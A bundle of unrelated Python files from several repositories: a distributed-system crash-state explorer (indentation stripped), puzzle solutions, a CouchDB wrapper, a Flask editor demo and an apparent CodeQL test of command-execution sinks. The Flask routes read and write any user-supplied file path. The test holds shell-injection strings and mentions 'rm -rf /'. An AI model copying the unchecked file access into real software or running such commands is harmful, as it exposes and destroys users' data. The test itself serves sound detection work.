#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import os
import subprocess
import cProfile
import Queue
import threading
import time
import pprint
import code
import sys
import collections
import gc
from _paceutils import *
from pace import DSReplayer
from pacedefaultfs import defaultfs, defaultnet
import itertools
import pickle
from collections import defaultdict
import math
class MultiThreadedChecker(threading.Thread):
queue = Queue.Queue()
outputs = {}
def __init__(self, queue, thread_id='0'):
threading.Thread.__init__(self)
self.queue = MultiThreadedChecker.queue
self.thread_id = str(thread_id)
def __threaded_check(self, base_path, dirnames, client_stdout, crashid):
assert type(paceconfig(0).checker_tool) in [list, str, tuple]
dirname_param = ''
for dirname in dirnames.values():
dirname_param += str(dirname) + str('@')
args = [paceconfig(0).checker_tool, dirname_param, base_path, client_stdout, self.thread_id]
retcode = subprocess.call(args)
MultiThreadedChecker.outputs[crashid] = retcode
def run(self):
while True:
task = self.queue.get()
self.__threaded_check(*task)
self.queue.task_done()
@staticmethod
def check_later(base_path, dirnames, client_stdout, retcodeid):
MultiThreadedChecker.queue.put((base_path, dirnames, client_stdout, retcodeid))
@staticmethod
def reset():
assert MultiThreadedChecker.queue.empty()
MultiThreadedChecker.outputs = {}
@staticmethod
def wait_and_get_outputs():
MultiThreadedChecker.queue.join()
return MultiThreadedChecker.outputs
def get_crash_point_id_string(crash_point):
toret = ""
for i in range(0, len(crash_point)):
c = crash_point[i]
if c == -1:
c = 'z' # the node has not done any persistent state update
if i < len(crash_point)-1:
toret += str(c) + "-"
else:
toret += str(c)
return toret
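# Editor's check (not in the original): machines that have made no
# persistent update (index -1) render as 'z'.
assert get_crash_point_id_string((3, -1, 0)) == "3-z-0"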
def dict_value_product(dicts):
return (dict(zip(dicts, x)) for x in itertools.product(*dicts.itervalues()))
def atleast_one_present(machines, currs, ends):
for m in machines:
if currs[m] < len(ends[m]):
return True
return False
def replay_dir_base_name_RO(crash_point, omit_pt):
assert type(omit_pt) == dict
base_name = get_crash_point_id_string(crash_point)
base_name += "_RO"
def dict_string(d):
toret = ''
for key in d:
toret += '_' + str(key) + '=' + str(d[key])
return toret
base_name += "_OM" + dict_string(omit_pt)
return base_name
def replay_dir_base_name_ARO(crash_point, omit_pt):
assert type(omit_pt) == dict
base_name = get_crash_point_id_string(crash_point)
def dict_string(d):
toret = ''
for key in d:
toret += '_' + str(key) + '=' + str(d[key][1])
return toret
base_name += "_ARO" + dict_string(omit_pt)
return base_name
def replay_dir_base_name_AP(crash_point, end_pt):
assert type(end_pt) == dict
base_name = get_crash_point_id_string(crash_point)
def dict_string(d):
toret = ''
for key in d:
toret += '_' + str(key) + '=' + str(d[key])
return toret
base_name += "_AP" + dict_string(end_pt)
return base_name
def append_or_trunc_ops(replayer, machines, crash_point):
toret = {}
for machine in machines:
curr_op = replayer.micro_ops[machine][crash_point[machine]].op
toret[machine] = curr_op == 'append' or curr_op == 'trunc'
return toret
def nCr(n,r):
func = math.factorial
return func(n) / func(r) / func(n-r)
def get_replay_dirs(machines, base_name):
dirnames = {}
base_path = os.path.join(paceconfig(0).scratchpad_dir, base_name)
for machine in machines:
os.system('rm -rf ' + base_path)
os.system('mkdir -p ' + base_path)
dirnames[machine] = os.path.join(base_path , 'rdir-' + str(machine))
stdout_files = {}
for machine_id in dirnames.keys():
stdout_files[machine_id] = os.path.join(base_path, str(machine_id) + '.input_stdout')
return (base_path, dirnames,stdout_files)
def unique_grp(grps, machines, filter_machines):
assert len(machines) > 0 and len(filter_machines) < len(machines)
to_ret = []
to_ret_set = set()
temp = {}
max_for_state = defaultdict(lambda:-1, temp)
for state in grps:
state_arr = list(state)
for machine in machines:
if machine not in filter_machines:
val = state_arr[machine]
del state_arr[machine]
if tuple(state_arr) not in max_for_state.keys():
max_for_state[tuple(state_arr)] = val
else:
if max_for_state[tuple(state_arr)] < val:
max_for_state[tuple(state_arr)] = val
state_arr.insert(machine, max_for_state[tuple(state_arr)])
to_ret_set.add(tuple(state_arr))
return to_ret_set
def check_logically_same(to_omit_list):
ops_eq = all(x.op == to_omit_list[0].op for x in to_omit_list)
if ops_eq:
name_checking_ops = ['write', 'append', 'creat', 'trunc', 'unlink']
if to_omit_list[0].op in name_checking_ops:
name_eq = all(os.path.basename(x.name) == os.path.basename(to_omit_list[0].name) for x in to_omit_list)
return ops_eq and name_eq
elif to_omit_list[0].op == 'rename':
dest_eq = all(os.path.basename(x.dest) == os.path.basename(to_omit_list[0].dest) for x in to_omit_list)
src_eq = all(os.path.basename(x.source) == os.path.basename(to_omit_list[0].source) for x in to_omit_list)
return ops_eq and dest_eq and src_eq
else:
for omit in to_omit_list:
if 'fsync' in str(omit):
return False
assert False
else:
return False
def compute_reachable_global_prefixes(replayer):
print 'Computing globally reachable prefix states'
assert paceconfig(0).cached_prefix_states_file is not None and len(paceconfig(0).cached_prefix_states_file) > 0
prefix_cached_file = paceconfig(0).cached_prefix_states_file
interesting_prefix_states = []
final_reachable_prefix_fsync_deps = set()
if not os.path.isfile(prefix_cached_file):
print 'No cached file. Computing reachable prefixes from scratch.'
base_lists = replayer.ops_indexes().values()
list0 = base_lists[0]
list1 = base_lists[1]
interesting_prefix_states = []
# Algorithm to find all consistent cuts of persistent states:
        # Naive method: Let us say there are 3 machines, and the numbers of
        # events in the traces from the three machines are <n1, n2, n3>. Then
        # there are n1 X n2 X n3
# ways in which these traces could combine.
# Should we check for everything?
# No, we can do better; intuition: if i X j is not consistent then any superset of
        # it <i, j, k> for any k is inconsistent.
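        # Editor's illustration (hypothetical indexes, not in the original):
        # if the pair (3, 5) for machines 0 and 1 is not a legal global
        # prefix, no extension (3, 5, k) is ever tested for machine 2; only
        # legal pairs survive into interesting_prefix_states and are
        # extended in the loops below.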
for index1 in list0:
for index2 in list1:
if replayer.is_legal_gp((index1, index2)):
interesting_prefix_states.append((index1, index2))
for i in range(2, len(base_lists)):
interesting_prefix_cache = []
for index in base_lists[i]:
for inter in interesting_prefix_states:
to_check = inter + (index, )
if replayer.is_legal_gp(to_check):
interesting_prefix_cache.append(to_check)
interesting_prefix_states = interesting_prefix_cache
for state in interesting_prefix_states:
index = 0
candidate = []
for point in state:
candidate.append(replayer.persistent_op_index(index, point))
index += 1
candidate = tuple(candidate)
final_reachable_prefix_fsync_deps.add(candidate)
with open(prefix_cached_file, "w") as f:
pickle.dump(final_reachable_prefix_fsync_deps, f, protocol = 0)
else:
print 'Using cached globally reachable states'
with open(prefix_cached_file, "r") as f:
final_reachable_prefix_fsync_deps = pickle.load(f)
final_reachable_prefix_no_deps = set(list(final_reachable_prefix_fsync_deps)[:])
assert not bool(final_reachable_prefix_no_deps.symmetric_difference(final_reachable_prefix_fsync_deps))
# We are mostly done here. But there is one more optimization that we could do.
# if a trace ends with fsync or fdatasync, then it can be skipped for replay
    # because there is no specific operation to replay for an fsync. However,
# they are important to calculate FS reordering dependencies. So, we maintain
# two sets: one with fsync deps (we will use when we apply FS reordering),
# one with no fsync deps that we will use to replay globally reachable prefixes
interesting_states_check = set(list(final_reachable_prefix_fsync_deps)[:])
for state in interesting_states_check:
machine = 0
for end_point in state:
if replayer.micro_ops[machine][end_point].op == 'fsync' or replayer.micro_ops[machine][end_point].op == 'fdatasync' or\
replayer.micro_ops[machine][end_point].op == 'file_sync_range':
prev_point = replayer.get_prev_op(state)
# if subsumed by another GRP, just remove this. If not subsumed, leave it
if prev_point in interesting_states_check:
final_reachable_prefix_no_deps.remove(state)
break
machine += 1
assert final_reachable_prefix_fsync_deps is not None and len(final_reachable_prefix_fsync_deps) > 0
assert final_reachable_prefix_no_deps is not None and len(final_reachable_prefix_no_deps) > 0
assert final_reachable_prefix_no_deps <= final_reachable_prefix_fsync_deps
return (final_reachable_prefix_fsync_deps, final_reachable_prefix_no_deps)
def apm_machines(rule_set):
# R3: Relaxed on the master.
# R4: Relaxed on any one slave.
# R5: Relaxed on all nodes at the same time
to_ret = []
#We are assuming about the order of machines
#Fix this assumption - TODO.
if 'r3' in rule_set:
to_ret.append([0])
if 'r4' in rule_set:
to_ret.append([1])
if 'r5' in rule_set:
to_ret.append([0,1,2])
return to_ret
def replay_correlated_global_prefix(replayer, interesting_prefix_states, replay = True):
print 'Checking prefix crash states...'
machines = replayer.conceptual_machines()
replay_start = time.time()
count = 0
for crash_point in interesting_prefix_states:
assert len(crash_point) == len(machines)
base_name = get_crash_point_id_string(crash_point)
base_name += "_GRP"
for machine in machines:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], get_crash_point_id_string(crash_point))
count += 1
#if count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Prefix states : ' + str(count)
print 'Prefix replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def replay_correlated_atomicity_prefix(replayer, interesting_prefix_states, client_index, rule_set, replay = True):
machines = replayer.conceptual_machines()
fs_ops = replayer.fs_ops_indexes()
server_machines = machines[:]
server_machines.remove(client_index)
server_count = len(server_machines)
assert server_count == 3
count = 0
replay_start = time.time()
replayer.set_environment(defaultfs('count', 3), defaultnet(), load_cross_deps = False)
apm_imposed_subset_machineset = apm_machines(rule_set)
for apm_imposed_machines in apm_imposed_subset_machineset:
for machine in machines:
replayer.load(machine, 0)
for crash_point in interesting_prefix_states:
atomic_ends = {}
atomic_currs = {}
machine = 0
for end_point in crash_point:
if machine in apm_imposed_machines:
atomic_ends[machine] = range(0, replayer.iops_len(machine, end_point))
atomic_currs[machine] = 0
machine += 1
atomic_end_list = []
while atleast_one_present(apm_imposed_machines, atomic_currs, atomic_ends):
atomic_end = {}
for machine in apm_imposed_machines:
if atomic_currs[machine] < len(atomic_ends[machine]):
atomic_end[machine] = atomic_ends[machine][atomic_currs[machine]]
else:
atomic_end[machine] = atomic_ends[machine][len(atomic_ends[machine])-1]
atomic_currs[machine] += 1
atomic_end_list.append(atomic_end)
for atomic_end in atomic_end_list:
for machine in server_machines:
if machine in apm_imposed_machines:
replayer.iops_end_at(machine, (crash_point[machine], atomic_end[machine]))
else:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
replayer.iops_end_at(client_index, (crash_point[client_index], replayer.iops_len(client_index, crash_point[client_index]) - 1))
base_name = replay_dir_base_name_AP(crash_point, atomic_end)
count += 1
if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], base_name)
#if count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Atomicity Prefix correlated states : ' + str(count)
print 'Atomicity Prefix correlated replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def replay_correlated_reordering(replayer, interesting_prefix_states, client_index, rule_set, replay = True):
def end_highest_so_far(machine, curr_endpoint):
machine_dict = can_omit_for_machine_endpoint[machine]
maximum = -1
for key in machine_dict.keys():
if key > maximum and key <= curr_endpoint:
maximum = key
return maximum
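    # e.g. if can_omit_for_machine_endpoint[machine] has cached keys {3, 7}
    # and curr_endpoint is 5, this returns 3; it returns -1 when no cached
    # endpoint is <= curr_endpoint.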
machines = replayer.conceptual_machines()
fs_ops = replayer.fs_ops_indexes()
can_omit_ops = {}
can_omit_for_machine_endpoint = {}
server_machines = machines[:]
server_machines.remove(client_index)
server_count = len(server_machines)
assert server_count == 3
for machine in machines:
can_omit_ops[machine] = defaultdict(list)
for machine in machines:
can_omit_for_machine_endpoint[machine] = defaultdict(list)
replay_start = time.time()
for machine in machines:
replayer.load(machine, 0)
    # Phase 1: See which ops can be dropped for each end point in a machine.
    # For example, say the GRP is (x, y, z). For x in machine0, there can
    # be multiple ops that are before x and can still be dropped when we end at x.
    # For example, consider the following:
    # x-2: creat(file)
    # x-1: write(foo)
    # x  : write(bar)
    # In the above trace, it is legal to drop creat when the machine crashes at x.
    # In this phase, we will find all such points that can be dropped for each x.
for crash_point in interesting_prefix_states:
for machine in machines:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
machine_id = 0
for end_point in crash_point:
can_end_highest = end_highest_so_far(machine_id, end_point)
if can_end_highest == -1:
omit_ops = [fs_op for fs_op in fs_ops[machine_id] if fs_op > -1 and fs_op < end_point]
else:
omit_ops1 = can_omit_for_machine_endpoint[machine_id][can_end_highest]
omit_ops2 = [fs_op for fs_op in fs_ops[machine_id] if fs_op >= can_end_highest and fs_op > -1 and fs_op < end_point]
omit_ops = omit_ops1 + omit_ops2
can_omit_temp = []
omit_ops_temp = []
for i in omit_ops:
replayer.mops_omit(machine_id, i)
if replayer.is_legal_reordering(machine_id):
can_omit_temp.append(i)
omit_ops_temp.append(i)
replayer.mops_include(machine_id, i)
can_omit_for_machine_endpoint[machine_id][end_point] = omit_ops_temp
can_omit_ops[machine_id][end_point] = can_omit_temp
machine_id += 1
    # Phase 2: Using the points collected in phase 1, we can now see what points can be dropped across machines.
    # For example, for (x, y, z), if the drop dictionary looks like {x: [0, 2, 4], y: [1], z: [5, 7]},
    # then we have 3*1*2 ways of dropping. Notice that we don't need to check if this is a valid reordering.
    # It *has* to be a valid state, as the local drop points have already been checked for this condition.
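    # Illustration (assuming dict_value_product behaves like itertools.product
    # over the dict's values): {0: [0, 2, 4], 1: [1]} would yield
    # {0: 0, 1: 1}, {0: 2, 1: 1} and {0: 4, 1: 1}.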
reordering_count = 0
apm_imposed_subset_machineset = apm_machines(rule_set)
for apm_imposed_machines in apm_imposed_subset_machineset:
for crash_point in interesting_prefix_states:
omittables = {}
for machine in machines:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
for machine in apm_imposed_machines:
if machine != client_index:
omittables[machine] = can_omit_ops[machine][crash_point[machine]]
for omit_pt in list(dict_value_product(omittables)):
to_omit_list = []
for mac in omit_pt.keys():
curr_omit = omit_pt[mac]
to_omit_list.append(replayer.micro_ops[mac][curr_omit])
if check_logically_same(to_omit_list):
reordering_count += 1
replayer.mops_omit_group(omit_pt)
base_name = replay_dir_base_name_RO(crash_point, omit_pt)
if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], base_name)
#if reordering_count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
replayer.mops_include_group(omit_pt)
del omittables
omittables = None
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Reordering correlated states : ' + str(reordering_count)
print 'Reordering correlated replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def replay_correlated_atomicity_reordering(replayer, interesting_prefix_states, client_index, rule_set, replay = True):
machines = replayer.conceptual_machines()
fs_ops = replayer.fs_ops_indexes()
can_omit_ops = {}
server_machines = machines[:]
server_machines.remove(client_index)
server_count = len(server_machines)
assert server_count == 3
atomicity_reordering_count = 0
replay_start = time.time()
replayer.set_environment(defaultfs('count', 3), defaultnet(), load_cross_deps = False)
apm_imposed_subset_machineset = apm_machines(rule_set)
for machine in machines:
replayer.load(machine, 0)
for apm_imposed_machines in apm_imposed_subset_machineset:
for crash_point in interesting_prefix_states:
append_trunc_indexes = append_or_trunc_ops(replayer, server_machines, crash_point)
if any(append_trunc_indexes.values()):
                # First, end all machines at the GRP point
                for machine in machines:
                    replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
# Next we have to omit the sub (io or disk) ops as we call it
atomic_omits = {}
atomic_ro_currs = {}
machine = 0
for end_point in crash_point:
atomic_ro_currs[machine] = 0
if machine in apm_imposed_machines:
if append_trunc_indexes[machine]:
# If it is an append or trunc, break it into pieces and see for its absence
atomic_omits[machine] = range(0, replayer.iops_len(machine, end_point))
else:
# if not append, just put a marker. We will exclude this marker later
atomic_omits[machine] = [str(replayer.iops_len(machine, end_point)-1)]
                    machine += 1
atomic_omit_list = []
while atleast_one_present(apm_imposed_machines, atomic_ro_currs, atomic_omits):
atomic_omit = {}
for machine in apm_imposed_machines:
if atomic_ro_currs[machine] < len(atomic_omits[machine]):
atomic_omit[machine] = atomic_omits[machine][atomic_ro_currs[machine]]
else:
atomic_omit[machine] = None
atomic_ro_currs[machine] += 1
atomic_omit_list.append(atomic_omit)
for atomic_omit_x in atomic_omit_list:
atomic_omit = atomic_omit_x.copy()
base_name_prep = atomic_omit_x.copy()
for mac in apm_imposed_machines:
iop_index = atomic_omit[mac]
                        if isinstance(iop_index, str) or iop_index is None:
del atomic_omit[mac]
else:
atomic_omit[mac] = (crash_point[mac], iop_index)
base_name_prep[mac] = (crash_point[mac], iop_index)
replayer.iops_omit_group(atomic_omit)
base_name = replay_dir_base_name_ARO(crash_point, base_name_prep)
atomicity_reordering_count += 1
if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], base_name)
#if atomicity_reordering_count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
replayer.iops_include_group(atomic_omit)
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Atomicity reordering correlated states : ' + str(atomicity_reordering_count)
print 'Atomicity reordering correlated replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def check_corr_crash_vuls(pace_configs, sock_config, rule_set, threads = 1, replay = False):
print 'Parsing traces to determine logical operations ...'
#initialize the replayer
replayer = DSReplayer(pace_configs, sock_config)
    #set the environment - what file system (defaultfs)? what network (defaultnet)?
replayer.set_environment(defaultfs('count', 1), defaultnet(), load_cross_deps = True)
#did we parse and understand? if yes, print.
replayer.print_ops(show_io_ops = True)
print 'Successfully parsed logical operations!'
    if not replay:
return
assert threads > 0
for i in range(0, threads):
t = MultiThreadedChecker(MultiThreadedChecker.queue, i)
t.setDaemon(True)
t.start()
(reachable_prefix_fsync_deps, reachable_prefix_no_deps) = compute_reachable_global_prefixes(replayer)
MultiThreadedChecker.reset()
replay_correlated_global_prefix(replayer, reachable_prefix_no_deps, True)
MultiThreadedChecker.reset()
replay_correlated_reordering(replayer, reachable_prefix_fsync_deps, replayer.client_index, rule_set, True)
MultiThreadedChecker.reset()
replay_correlated_atomicity_reordering(replayer, reachable_prefix_no_deps, replayer.client_index, rule_set, True)
MultiThreadedChecker.reset()
replay_correlated_atomicity_prefix(replayer, reachable_prefix_no_deps, replayer.client_index, rule_set, True)
uppath = lambda _path, n: os.sep.join(_path.split(os.sep)[:-n])
os.system('cp ' + os.path.join(uppath(paceconfig(0).cached_prefix_states_file, 1), 'micro_ops') + ' ' + paceconfig(0).scratchpad_dir)
|
ramanala/PACE
|
pacenonrsmexplorer.py
|
Python
|
mit
| 23,519
|
#!/usr/bin/env python3
import sys
import re
def extract(s):
return [int(x) for x in re.findall(r'(-?\d+).?', s)]
def fold_x(dot, x):
if dot[0] > x:
diff = dot[0] - x
return (x - diff, dot[1])
return dot
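# Illustration (not part of the original solution): folding the dot (10, 4)
# along x=7 gives (4, 4), since 10 > 7 and the mirrored x is 7 - (10 - 7) = 4.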
def main(args):
p1, p2 = sys.stdin.read().split("\n\n")
dots = [tuple(extract(l)) for l in p1.split("\n")]
instrs = p2.split("\n")
i1 = extract(instrs[0])[0]
# does assuming x always work??
new = {fold_x(dot, i1) for dot in dots}
print(len(new))
if __name__ == '__main__':
main(sys.argv)
|
msullivan/advent-of-code
|
2021/13a.py
|
Python
|
mit
| 559
|
from pymogilefs import backend, client, exceptions
# Set default logging handler to avoid "No handler found" warnings.
import logging
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
|
bwind/pymogilefs
|
pymogilefs/__init__.py
|
Python
|
mit
| 354
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isSameTree(self, p, q):
"""
:type p: TreeNode
:type q: TreeNode
:rtype: bool
"""
        if p is None and q is None:
            return True
        if p is None or q is None:
            return False
        return p.val == q.val and self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)
|
pineal/Leetcode_OJ
|
python/100_Same_Tree.py
|
Python
|
mit
| 615
|
from flask import Blueprint
from flask import render_template, jsonify, request, redirect, url_for
mod = Blueprint('demo1', __name__, )
@mod.route('/', methods=["GET", "POST"])
def index():
return redirect(url_for('demo1.editor'))
@mod.route('/editor', methods=["GET", "POST"])
def editor():
return render_template('demo1.html')
@mod.route('/fetch', methods=["GET", "POST"])
def fetch_file():
filepath = request.args.get('path')
if not filepath:
return "No path passed", 403
    try:
        with open(filepath, "rb") as f:
            content = f.read()
    except Exception:
        return "Error reading file", 403
return jsonify(content=content)
@mod.route('/save', methods=["GET", "POST"])
def save_file():
filepath = request.args.get('path')
content = request.args.get('content')
if not filepath:
return "No path passed", 403
if not content:
return "No content passed", 403
try:
with open(filepath, "wb") as f:
f.write(content)
message = "File saved successfully"
    except Exception:
return "Error writing file", 403
return jsonify(content=message)
|
arpitbbhayani/editor-demo
|
app/views/demo1.py
|
Python
|
mit
| 1,134
|
import copy
import functools
from jsonobject import *
from couchdbkit import schema
from restkit import ResourceNotFound
from couchjock.proxy_dict import ProxyDict
SchemaProperty = ObjectProperty
SchemaListProperty = ListProperty
StringListProperty = functools.partial(ListProperty, unicode)
SchemaDictProperty = DictProperty
class DocumentSchema(JsonObject):
@StringProperty
def doc_type(self):
return self.__class__.__name__
@property
def _doc(self):
return ProxyDict(self, self._obj)
class DocumentBase(DocumentSchema):
_id = StringProperty()
_rev = StringProperty()
_attachments = DictProperty()
_db = None
def to_json(self):
doc = copy.copy(super(DocumentBase, self).to_json())
for special in ('_id', '_rev', '_attachments'):
if not doc[special]:
del doc[special]
return doc
# The rest of this class is mostly copied from couchdbkit 0.5.7
@classmethod
def set_db(cls, db):
cls._db = db
@classmethod
def get_db(cls):
db = cls._db
if db is None:
raise TypeError("doc database required to save document")
return db
def save(self, **params):
""" Save document in database.
        @param db: couchdbkit.core.Database instance
"""
# self.validate()
db = self.get_db()
doc = self.to_json()
db.save_doc(doc, **params)
if '_id' in doc and '_rev' in doc:
self.update(doc)
elif '_id' in doc:
self.update({'_id': doc['_id']})
store = save
@classmethod
def save_docs(cls, docs, use_uuids=True, all_or_nothing=False):
""" Save multiple documents in database.
        @param docs: list of couchdbkit.schema.Document instances
        @param use_uuids: add _id to docs that don't have it already set.
        @param all_or_nothing: in the case of a power failure, when the database
        restarts, either all the changes will have been saved or none of them.
        However, it does not do conflict checking, so the documents will
        be committed even if this creates conflicts.
"""
db = cls.get_db()
docs_to_save = [doc for doc in docs if doc._doc_type == cls._doc_type]
if not len(docs_to_save) == len(docs):
raise ValueError("one of your documents does not have the correct type")
db.bulk_save(docs_to_save, use_uuids=use_uuids, all_or_nothing=all_or_nothing)
bulk_save = save_docs
@classmethod
def get(cls, docid, rev=None, db=None, dynamic_properties=True):
""" get document with `docid`
"""
if not db:
db = cls.get_db()
cls._allow_dynamic_properties = dynamic_properties
return db.get(docid, rev=rev, wrapper=cls.wrap)
@classmethod
def get_or_create(cls, docid=None, db=None, dynamic_properties=True, **params):
""" get or create document with `docid` """
if db:
cls.set_db(db)
cls._allow_dynamic_properties = dynamic_properties
db = cls.get_db()
if docid is None:
obj = cls()
obj.save(**params)
return obj
rev = params.pop('rev', None)
try:
return db.get(docid, rev=rev, wrapper=cls.wrap, **params)
except ResourceNotFound:
obj = cls()
obj._id = docid
obj.save(**params)
return obj
new_document = property(lambda self: self._doc.get('_rev') is None)
def delete(self):
""" Delete document from the database.
        @param db: couchdbkit.core.Database instance
"""
if self.new_document:
raise TypeError("the document is not saved")
db = self.get_db()
# delete doc
db.delete_doc(self._id)
# reinit document
del self._doc['_id']
del self._doc['_rev']
class Document(DocumentBase, schema.QueryMixin, schema.AttachmentMixin):
@property
def get_id(self):
return self._id
@property
def get_rev(self):
return self._rev
|
dannyroberts/couchjock
|
couchjock/__init__.py
|
Python
|
mit
| 4,152
|
# Note: Some of these commands will technically not allow an attacker to execute
# arbitrary system commands, but only specify the program to be executed. The general
# consensus was that even this is still a high security risk, so we also treat them as
# system command executions.
#
# As an example, executing `subprocess.Popen(["rm -rf /"])` will result in
# `FileNotFoundError: [Errno 2] No such file or directory: 'rm -rf /'`
########################################
import os
# can't use a string literal with spaces in the tags of an InlineExpectationsTest, so using variables :|
os.popen("cmd1; cmd2") # $getCommand="cmd1; cmd2"
os.system("cmd1; cmd2") # $getCommand="cmd1; cmd2"
def os_members():
# hmm, it's kinda annoying to check that we handle this import correctly for
# everything. It's quite useful since I messed it up initially and didn't have a
# test for it, but in the long run it's just cumbersome to duplicate all the tests
# :|
from os import popen, system
popen("cmd1; cmd2") # $getCommand="cmd1; cmd2"
system("cmd1; cmd2") # $getCommand="cmd1; cmd2"
########################################
# https://docs.python.org/3.8/library/os.html#os.execl
#
# VS Code extension will ignore rest of program if encountering one of these, which we
# don't want. We could use `if False`, but just to be 100% sure we don't do anything too
# clever in our analysis that discards that code, I used `if UNKNOWN` instead
#
# below, `path` is a relative/absolute path; for the `p` variants this could also be
# the name of an executable, which will be looked up in the PATH environment variable,
# which we call `file` to highlight this difference.
#
# These are also modeled as FileSystemAccess, although they are not super relevant for
# the path-injection query -- a user being able to control which program is executed
# doesn't sound safe even if that is restricted to be within a certain directory.
if UNKNOWN:
env = {"FOO": "foo"}
os.execl("path", "<progname>", "arg0") # $ getCommand="path" getAPathArgument="path"
os.execle("path", "<progname>", "arg0", env) # $ getCommand="path" getAPathArgument="path"
os.execlp("file", "<progname>", "arg0") # $ getCommand="file" getAPathArgument="file"
os.execlpe("file", "<progname>", "arg0", env) # $ getCommand="file" getAPathArgument="file"
os.execv("path", ["<progname>", "arg0"]) # $ getCommand="path" getAPathArgument="path"
os.execve("path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.execvp("file", ["<progname>", "arg0"]) # $ getCommand="file" getAPathArgument="file"
os.execvpe("file", ["<progname>", "arg0"], env) # $ getCommand="file" getAPathArgument="file"
########################################
# https://docs.python.org/3.8/library/os.html#os.spawnl
env = {"FOO": "foo"}
os.spawnl(os.P_WAIT, "path", "<progname>", "arg0") # $ getCommand="path" getAPathArgument="path"
os.spawnle(os.P_WAIT, "path", "<progname>", "arg0", env) # $ getCommand="path" getAPathArgument="path"
os.spawnlp(os.P_WAIT, "file", "<progname>", "arg0") # $ getCommand="file" getAPathArgument="file"
os.spawnlpe(os.P_WAIT, "file", "<progname>", "arg0", env) # $ getCommand="file" getAPathArgument="file"
os.spawnv(os.P_WAIT, "path", ["<progname>", "arg0"]) # $ getCommand="path" getAPathArgument="path"
os.spawnve(os.P_WAIT, "path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.spawnvp(os.P_WAIT, "file", ["<progname>", "arg0"]) # $ getCommand="file" getAPathArgument="file"
os.spawnvpe(os.P_WAIT, "file", ["<progname>", "arg0"], env) # $ getCommand="file" getAPathArgument="file"
# unlike os.exec*, some os.spawn* functions are usable with keyword arguments. However,
# despite the docs using both `file` and `path` as the parameter name, you actually need
# to use `file` in all cases.
os.spawnv(mode=os.P_WAIT, file="path", args=["<progname>", "arg0"]) # $ getCommand="path" getAPathArgument="path"
os.spawnve(mode=os.P_WAIT, file="path", args=["<progname>", "arg0"], env=env) # $ getCommand="path" getAPathArgument="path"
os.spawnvp(mode=os.P_WAIT, file="file", args=["<progname>", "arg0"]) # $ getCommand="file" getAPathArgument="file"
os.spawnvpe(mode=os.P_WAIT, file="file", args=["<progname>", "arg0"], env=env) # $ getCommand="file" getAPathArgument="file"
# `posix_spawn` Added in Python 3.8
os.posix_spawn("path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.posix_spawn(path="path", argv=["<progname>", "arg0"], env=env) # $ getCommand="path" getAPathArgument="path"
os.posix_spawnp("path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.posix_spawnp(path="path", argv=["<progname>", "arg0"], env=env) # $ getCommand="path" getAPathArgument="path"
########################################
import subprocess
subprocess.Popen("cmd1; cmd2", shell=True) # $getCommand="cmd1; cmd2"
subprocess.Popen("cmd1; cmd2", shell="truthy string") # $getCommand="cmd1; cmd2"
subprocess.Popen(["cmd1; cmd2", "shell-arg"], shell=True) # $getCommand="cmd1; cmd2"
subprocess.Popen("cmd1; cmd2", shell=True, executable="/bin/bash") # $getCommand="cmd1; cmd2" getCommand="/bin/bash"
subprocess.Popen("executable") # $getCommand="executable"
subprocess.Popen(["executable", "arg0"]) # $getCommand="executable"
subprocess.Popen("<progname>", executable="executable") # $getCommand="executable"
subprocess.Popen(["<progname>", "arg0"], executable="executable") # $getCommand="executable"
# call/check_call/check_output/run all work like Popen from a command execution point of view
subprocess.call(["executable", "arg0"]) # $getCommand="executable"
subprocess.check_call(["executable", "arg0"]) # $getCommand="executable"
subprocess.check_output(["executable", "arg0"]) # $getCommand="executable"
subprocess.run(["executable", "arg0"]) # $getCommand="executable"
########################################
# actively using known shell as the executable
subprocess.Popen(["/bin/sh", "-c", "vuln"]) # $getCommand="/bin/sh" MISSING: getCommand="vuln"
